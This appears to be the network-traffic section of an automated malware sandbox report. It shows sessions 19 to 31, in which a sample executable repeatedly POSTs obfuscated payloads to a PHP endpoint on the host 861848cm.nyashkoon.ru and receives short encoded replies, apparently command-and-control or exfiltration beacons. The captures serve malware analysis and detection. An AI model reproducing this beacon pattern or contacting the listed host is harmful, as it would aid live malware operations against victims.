                                                                                            Nov 5, 2024 23:52:47.664904118 CET1024OUTData Raw: 53 56 5a 59 56 5f 50 5b 5a 5f 52 51 54 5f 5b 5c 55 54 59 56 51 54 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SVZYV_P[Z_RQT_[\UTYVQTR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&//!?(X>3'=5Y?>6_$8X#<.Q(>.5(_4':&)'X$.Q-2
                                                                                            Nov 5, 2024 23:52:48.131917953 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:48.204116106 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            19192.168.2.44976037.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:48.355578899 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:48.712156057 CET1024OUTData Raw: 56 51 5a 5c 56 56 55 5f 5a 5f 52 51 54 5e 5b 5b 55 53 59 5c 51 56 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZ\VVU_Z_RQT^[[USY\QVR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%Y;<6+8^<(**"Z'<_ "P<= - 2X%'X$.Q-6
                                                                                            Nov 5, 2024 23:52:49.166454077 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:49.235811949 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:47 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            20192.168.2.44976137.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:50.319996119 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:50.675709009 CET1024OUTData Raw: 56 5f 5a 58 56 5f 50 52 5a 5f 52 51 54 5e 5b 53 55 50 59 5b 51 52 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_ZXV_PRZ_RQT^[SUPY[QRR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8/)?(7<+*:")]'#Y:?X,-C0_4:]2)'X$.Q-6


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            21192.168.2.44976237.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:50.907403946 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1264
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:51.262037992 CET1264OUTData Raw: 56 5f 5f 5e 56 5e 55 5e 5a 5f 52 51 54 5c 5b 5f 55 5d 59 57 51 55 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V__^V^U^Z_RQT\[_U]YWQUR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%8,>('(4(*=Y>$^ #?T+>?[:%^ .Y1'X$.Q->
                                                                                            Nov 5, 2024 23:52:51.719980001 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:51.792475939 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:49 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 5c 3c 14 26 11 30 5d 2b 0d 3e 3d 22 00 28 0e 0d 5a 2f 1c 38 5b 2a 55 38 11 3e 06 30 53 23 01 2b 59 35 54 35 5b 37 31 2c 00 3c 01 21 5f 05 1d 39 5b 30 39 2c 55 29 32 08 58 29 24 30 0a 25 1e 2b 19 2a 2b 08 5c 23 3a 26 56 26 2d 25 5b 32 0c 0d 18 3f 1a 04 07 39 06 2c 09 31 3a 2a 57 09 16 23 09 24 1d 02 00 2a 57 3c 06 24 2e 3a 06 32 39 23 1f 3e 3f 23 1f 34 1a 03 00 2b 33 05 5f 21 19 29 04 30 39 26 41 26 00 01 52 2b 32 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: \<&0]+>="(Z/8[*U8>0S#+Y5T5[71,<!_9[09,U)2X)$0%+*+\#:&V&-%[2?9,1:*W#$*W<$.:29#>?#4+3_!)09&A&R+2&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            22192.168.2.44976337.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:51.599241018 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:51.946196079 CET1024OUTData Raw: 56 56 5f 5f 56 5f 55 59 5a 5f 52 51 54 53 5b 5f 55 50 59 56 51 55 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VV__V_UYZ_RQTS[_UPYVQUR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^/!+#+3[*\1_='^ Z#,1(X.5'#7=%'X$.Q-
                                                                                            Nov 5, 2024 23:52:52.425318003 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:52.498301029 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:50 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            23192.168.2.44976437.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:52.632312059 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:52.977530003 CET1024OUTData Raw: 56 52 5a 5e 56 59 50 5c 5a 5f 52 51 54 5b 5b 53 55 52 59 5b 51 55 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VRZ^VYP\Z_RQT[[SURY[QUR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X/"V?('<(*!)^'^ #<"W(-3\,&8\#7]')'X$.Q-"
                                                                                            Nov 5, 2024 23:52:53.453485012 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:53.529540062 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:51 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            24192.168.2.44976537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:53.717717886 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:54.071305037 CET1024OUTData Raw: 53 52 5f 5b 56 56 50 58 5a 5f 52 51 54 52 5b 5b 55 51 59 56 51 5f 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SR_[VVPXZ_RQTR[[UQYVQ_RYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/.+^+<X>5X=-!$;4Z4%<>\:C X7.]&9'X$.Q-
                                                                                            Nov 5, 2024 23:52:54.545664072 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:54.623833895 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            25192.168.2.44976637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:54.747970104 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:55.102586985 CET1024OUTData Raw: 56 57 5a 58 56 58 55 5a 5a 5f 52 51 54 5f 5b 59 55 56 59 59 51 51 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VWZXVXUZZ_RQT_[YUVYYQQR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;?>V=8+?3X>>*$+#",2U(4,&'7>&'X$.Q-2
                                                                                            Nov 5, 2024 23:52:55.561048031 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:55.638500929 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:53 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            26192.168.2.44976837.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:55.765150070 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:56.118107080 CET1024OUTData Raw: 56 53 5a 55 53 58 50 5b 5a 5f 52 51 54 52 5b 5b 55 57 59 5c 51 50 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZUSXP[Z_RQTR[[UWY\QPR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%],=($?#')_=_'$#P(>/Y,5(!4%29'X$.Q-
                                                                                            Nov 5, 2024 23:52:56.591636896 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:56.667316914 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:54 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            27192.168.2.44976937.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:56.811791897 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:57.164937019 CET1284OUTData Raw: 56 50 5a 5d 53 5a 55 5a 5a 5f 52 51 54 52 5b 5c 55 50 59 57 51 53 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VPZ]SZUZZ_RQTR[\UPYWQSR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%]-/R?+(]? $>\5>-53# <!(=7],%/#7"29'X$.Q-
                                                                                            Nov 5, 2024 23:52:57.615921974 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:57.686734915 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:55 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 59 28 29 32 5f 24 2b 0a 53 29 3e 29 5b 3f 30 23 5b 2d 21 28 11 2a 1d 24 1e 2a 5e 3c 55 23 3c 23 5e 21 54 2d 5a 21 22 28 03 3f 11 21 5f 05 1d 3a 07 27 17 0d 08 29 21 36 1b 3e 37 01 1e 25 56 27 19 3e 15 31 04 37 04 0c 55 25 58 26 01 26 1c 20 0b 2b 27 2a 05 39 3f 38 0d 27 2a 2a 57 09 16 20 56 30 23 30 00 3e 0f 3c 07 27 2d 3e 03 31 03 23 52 2a 3f 2f 1f 37 42 3d 01 3d 0d 23 5f 36 27 0f 04 26 39 25 19 32 07 2c 0a 3c 18 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: Y()2_$+S)>)[?0#[-!(*$*^<U#<#^!T-Z!"(?!_:')!6>7%V'>17U%X&& +'*9?8'**W V0#0><'->1#R*?/7B==#_6'&9%2,<&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            28192.168.2.44977037.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:56.816936970 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:57.164895058 CET1016OUTData Raw: 53 55 5a 5d 53 58 55 59 5a 5f 52 51 54 5a 5b 53 55 53 59 59 51 56 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZ]SXUYZ_RQTZ[SUSYYQVR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;>?^8^<4Y(*%==&0;< 2V?#:&;4!%9'X$.Q-
                                                                                            Nov 5, 2024 23:52:57.636512041 CET25INHTTP/1.1 100 Continue


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            29192.168.2.44977237.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:57.811280966 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:58.164865971 CET1024OUTData Raw: 56 53 5a 54 56 5e 55 5a 5a 5f 52 51 54 52 5b 59 55 52 59 56 51 56 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZTV^UZZ_RQTR[YURYVQVRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%-?W<(3<7=9">-&%(8Y4<=<\.'47!&9'X$.Q-
                                                                                            Nov 5, 2024 23:52:58.633621931 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:58.710669994 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:56 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            30192.168.2.44977337.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:58.879673958 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:59.227482080 CET1024OUTData Raw: 56 5e 5a 55 56 5a 50 5c 5a 5f 52 51 54 53 5b 52 55 5c 59 5c 51 51 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V^ZUVZP\Z_RQTS[RU\Y\QQRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%];"((_(<X))_>_'( *V(.0Y!7>19'X$.Q-
                                                                                            Nov 5, 2024 23:52:59.698623896 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:59.766890049 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            31192.168.2.44977937.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:59.916762114 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:00.274300098 CET1016OUTData Raw: 56 51 5a 58 56 5b 50 59 5a 5f 52 51 54 5a 5b 5f 55 5d 59 5e 51 56 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZXV[PYZ_RQTZ[_U]Y^QVR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,?.S<^;>0'*2>.*'[4?+3-&8#$-&)'X$.Q-2
                                                                                            Nov 5, 2024 23:53:00.728030920 CET25INHTTP/1.1 100 Continue
